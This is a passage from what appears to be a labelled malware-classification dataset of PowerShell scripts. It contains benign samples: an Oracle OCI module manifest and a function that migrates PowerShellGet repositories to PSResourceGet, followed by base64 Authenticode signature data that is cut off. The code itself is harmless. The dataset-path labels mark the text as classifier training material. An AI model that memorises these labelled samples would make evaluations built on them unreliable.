wCt2VZoKUzeVIc61FMQ5gk7H2v2/C2aNpSMIXJ3yIxPGwzM9fmGhviaF6k2Homc6 # ttAdcE8/00cPuQzG5JnVFx9zS4NWIPEiP5nWWJiNaA1QqB3yveNFSoPG9q6oiqW/ # B6Dc7ocVx1djpe2dCe9E6FS6Wa+ORWgiWBSe6ec= # SIG # End signature block
combined_dataset/train/non-malicious/sample_18_31.ps1
sample_18_31.ps1
# # Module manifest for module 'OCI.PSModules.Oce' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Oce.dll' # Version number of this module. ModuleVersion = '79.0.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = '044c91ad-abeb-41a8-9bf6-cf7d46964003' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Oce Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '79.0.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Oce.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Get-OCIOceInstance', 'Get-OCIOceInstancesList', 'Get-OCIOceWorkRequest', 'Get-OCIOceWorkRequestErrorsList', 'Get-OCIOceWorkRequestLogsList', 'Get-OCIOceWorkRequestsList', 'Move-OCIOceInstanceCompartment', 'New-OCIOceInstance', 'Remove-OCIOceInstance', 'Update-OCIOceInstance' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Oce' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/sample_22_69.ps1
sample_22_69.ps1
<# .SYNOPSIS Finds the repositories registered with PowerShellGet and registers them for PSResourceGet. #> function Import-PSGetRepository { [CmdletBinding(SupportsShouldProcess, ConfirmImpact = 'Medium')] param( # Use the -Force switch to overwrite existing repositories. [switch]$Force ) $Runtime = [System.Runtime.InteropServices.RuntimeInformation] $OSPlatform = [System.Runtime.InteropServices.OSPlatform] # this checks for WindowsPwsh and Core $IsOSWindows = $Runtime::IsOSPlatform($OSPlatform::Windows) if ($IsOSWindows) { $PSGetAppLocalPath = Microsoft.PowerShell.Management\Join-Path -Path $env:LOCALAPPDATA -ChildPath 'Microsoft\Windows\PowerShell\PowerShellGet\' } else { $PSGetAppLocalPath = Microsoft.PowerShell.Management\Join-Path -Path ([System.Management.Automation.Platform]::SelectProductNameForDirectory('CACHE')) -ChildPath 'PowerShellGet' } $PSRepositoriesFilePath = Microsoft.PowerShell.Management\Join-Path -Path $PSGetAppLocalPath -ChildPath "PSRepositories.xml" $PSGetRepositories = Microsoft.PowerShell.Utility\Import-Clixml $PSRepositoriesFilePath -ea SilentlyContinue Microsoft.PowerShell.Utility\Write-Verbose ('Found {0} registered PowerShellGet repositories.' -f $PSGetRepositories.Count) if ($PSGetRepositories.Count) { $repos = @( $PSGetRepositories.Values | Microsoft.PowerShell.Core\Where-Object {$_.PackageManagementProvider -eq 'NuGet'-and $_.Name -ne 'PSGallery'} | Microsoft.PowerShell.Utility\Select-Object Name, Trusted, SourceLocation ) Microsoft.PowerShell.Utility\Write-Verbose ('Selected {0} NuGet repositories.' -f $repos.Count) if ($repos.Count) { $repos | Microsoft.PowerShell.Core\ForEach-Object { try { $message = 'Registering {0} at {1} -Trusted:${2} -Force:${3}.' -f $_.Name, $_.SourceLocation, $_.Trusted, $Force if ($PSCmdlet.ShouldProcess($message, $_.Name, 'Register-PSResourceRepository')) { $registerPSResourceRepositorySplat = @{ Name = $_.Name Uri = $_.SourceLocation Trusted = $_.Trusted PassThru = $true Force = $Force ApiVersion = if ([Uri]::new($_.SourceLocation).Scheme -eq 'file') {'local'} else {'v2'} } Register-PSResourceRepository @registerPSResourceRepositorySplat } } catch [System.Management.Automation.PSInvalidOperationException] { if ($_.Exception.Message -match 'already exists') { Microsoft.PowerShell.Utility\Write-Warning $_.Exception.Message Microsoft.PowerShell.Utility\Write-Warning 'Use the -Force switch to overwrite existing repositories.' } else { throw $_.Exception } } } } } } # SIG # Begin signature block # MIIoLQYJKoZIhvcNAQcCoIIoHjCCKBoCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCCGbRVCjkuAuO6c # hfY4EYA5iYXKrjQAEex9jeBBac8pz6CCDXYwggX0MIID3KADAgECAhMzAAADrzBA # DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA # hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG # 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN # xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL # go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB # tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd # mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ # 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY # 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp # XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn # TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT # e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG # OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O # PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk # ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx # HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt # CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGg0wghoJAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIHpu2F8FvGRfddxbJIc4bRwU # 5gIfFkL+YIcE13z6dtA0MEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAkxIofBAkoBNAvLWc1C4d07uoFJ27HYQ6h/LSwAW68Iqm6/p2FaoIJVco # GfwkiM5fbpV/PIWHSlWGRshRrPPmqBAhRO22HaSdfXNfB6fY7Y9BKuJU/SG+z0QS # kV75d5BN5MwY1CcPEYU3hG9DWFyP1v8tmfLJsX1zte7vXc+jP6L1cqGeG3XlrpfW # 1B6J2mpvbqPHK722By8vUPB0BGQLFaaHN5GMB9/T+F9+KMihX+ciew/u3X6ev0G9 # Ar/omt+ZIv8guUIobsNIa9Pqw/nD+bm28aLsrRNgJOBZWXrh4tHx5KYBausupsFB # p2k3MA2rreo3Ecz4CeQ7jZj8KR5X1KGCF5cwgheTBgorBgEEAYI3AwMBMYIXgzCC # F38GCSqGSIb3DQEHAqCCF3AwghdsAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFSBgsq # hkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCDP9W5z6QA8ONHiseOtFAr7GekLJ7c/1iah4oEq8i/bbgIGZfMsv/DM # GBMyMDI0MDQwNTIxMTAzMi45NzVaMASAAgH0oIHRpIHOMIHLMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l # cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046RTAwMi0w # NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Wg # ghHtMIIHIDCCBQigAwIBAgITMwAAAe4F0wIwspqdpwABAAAB7jANBgkqhkiG9w0B # AQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD # VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAeFw0yMzEyMDYxODQ1 # NDRaFw0yNTAzMDUxODQ1NDRaMIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25z # MScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046RTAwMi0wNUUwLUQ5NDcxJTAjBgNV # BAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2UwggIiMA0GCSqGSIb3DQEB # AQUAA4ICDwAwggIKAoICAQC+8byl16KEia8xKS4vVL7REOOR7LzYCLXEtWgeqyOV # lrzuEz+AoCa4tBGESjbHTXECeMOwP9TPeKaKalfTU5XSGjpJhpGx59fxMJoTYWPz # zD0O2RAlyBmOBBmiLDXRDQJL1RtuAjvCiLulVQeiPI8V7+HhTR391TbC1beSxwXf # dKJqY1onjDawqDJAmtwsA/gmqXgHwF9fZWcwKSuXiZBTbU5fcm3bhhlRNw5d04Ld # 15ZWzVl/VDp/iRerGo2Is/0Wwn/a3eGOdHrvfwIbfk6lVqwbNQE11Oedn2uvRjKW # EwerXL70OuDZ8vLzxry0yEdvQ8ky+Vfq8mfEXS907Y7rN/HYX6cCsC2soyXG3OwC # tLA7o0/+kKJZuOrD5HUrSz3kfqgDlmWy67z8ZZPjkiDC1dYW1jN77t5iSl5Wp1HK # Bp7JU8RiRI+vY2i1cb5X2REkw3WrNW/jbofXEs9t4bgd+yU8sgKn9MtVnQ65s6QG # 72M/yaUZG2HMI31tm9mooH29vPBO9jDMOIu0LwzUTkIWflgd/vEWfTNcPWEQj7fs # WuSoVuJ3uBqwNmRSpmQDzSfMaIzuys0pvV1jFWqtqwwCcaY/WXsb/axkxB/zCTdH # SBUJ8Tm3i4PM9skiunXY+cSqH58jWkpHbbLA3Ofss7e+JbMjKmTdcjmSkb5oN8qU # 1wIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFBCIzT8a2dwgnr37xd+2v1/cdqYIMB8G # A1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8GA1UdHwRYMFYwVKBSoFCG # Tmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUy # MFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBsBggrBgEFBQcBAQRgMF4w # XAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2Vy # dHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwG # A1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQD # AgeAMA0GCSqGSIb3DQEBCwUAA4ICAQB3ZyAva2EKOWSVpBnYkzX8f8GZjaOs577F # 9o14Anh9lKy6tS34wXoPXEyQp1v1iI7rJzZVG7rpUznay2n9csfn3p6y7kYkHqtS # ugCGmTiiBkwhFfSByKPI08MklgvJvKTZb673yGfpFwPjQwZeI6EPj/OAtpYkT7IU # XqMki1CRMJKgeY4wURCccIujdWRkoVv4J3q/87KE0qPQmAR9fqMNxjI3ZClVxA4w # iM3tNVlRbF9SgpOnjVo3P/I5p8Jd41hNSVCx/8j3qM7aLSKtDzOEUNs+ZtjhznmZ # gUd7/AWHDhwBHdL57TI9h7niZkfOZOXncYsKxG4gryTshU6G6sAYpbqdME/+/g1u # er7VGIHUtLq3W0Anm8lAfS9PqthskZt54JF28CHdsFq/7XVBtFlxL/KgcQylJNni # a+anixUG60yUDt3FMGSJI34xG9NHsz3BpqSWueGtJhQ5ZN0K8ju0vNVgF+Dv05si # rPg0ftSKf9FVECp93o8ogF48jh8CT/B32lz1D6Truk4Ezcw7E1OhtOMf7DHgPMWf # 6WOdYnf+HaSJx7ZTXCJsW5oOkM0sLitxBpSpGcj2YjnNznCpsEPZat0h+6d7ulRa # WR5RHAUyFFQ9jRa7KWaNGdELTs+nHSlYjYeQpK5QSXjigdKlLQPBlX+9zOoGAJho # Zfrpjq4nQDCCB3EwggVZoAMCAQICEzMAAAAVxedrngKbSZkAAAAAABUwDQYJKoZI # hvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # MjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAy # MDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp # bWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoIC # AQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXIyjVX9gF/bErg4r25Phdg # M/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPF # dvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6 # GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v3byNpOORj7I5LFGc6XBp # Dco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pGve2krnopN6zL64NF50Zu # yjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viSkR4dPf0gz3N9QZpGdc3E # XzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0 # lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1q # GFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ # +QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PA # PBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIurQIDAQABo4IB3TCCAdkw # EgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxG # NSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMFwGA1UdIARV # MFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEWM2h0dHA6Ly93d3cubWlj # cm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAK # BggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMC # AYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvX # zpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20v # cGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYI # KwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG # 9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0x # M7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmC # VgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1bSNU5HhTdSRXud2f8449 # xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4rPf5KYnDvBewVIVCs/wM # nosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDS # PeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDFNLB62FD+CljdQDzHVG2d # Y3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxn # GSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdUCbFpAUR+fKFhbHP+Crvs # QWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokL # jzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTmdHRbatGePu1+oDEzfbzL # 6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggNQ # MIICOAIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp # bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw # b3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJpY2EgT3BlcmF0aW9uczEn # MCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOkUwMDItMDVFMC1EOTQ3MSUwIwYDVQQD # ExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQCI # o6bVNvflFxbUWCDQ3YYKy6O+k6CBgzCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w # IFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6bqqaTAiGA8yMDI0MDQwNTE2NTA0 # OVoYDzIwMjQwNDA2MTY1MDQ5WjB3MD0GCisGAQQBhFkKBAExLzAtMAoCBQDpuqpp # AgEAMAoCAQACAhv1AgH/MAcCAQACAhM5MAoCBQDpu/vpAgEAMDYGCisGAQQBhFkK # 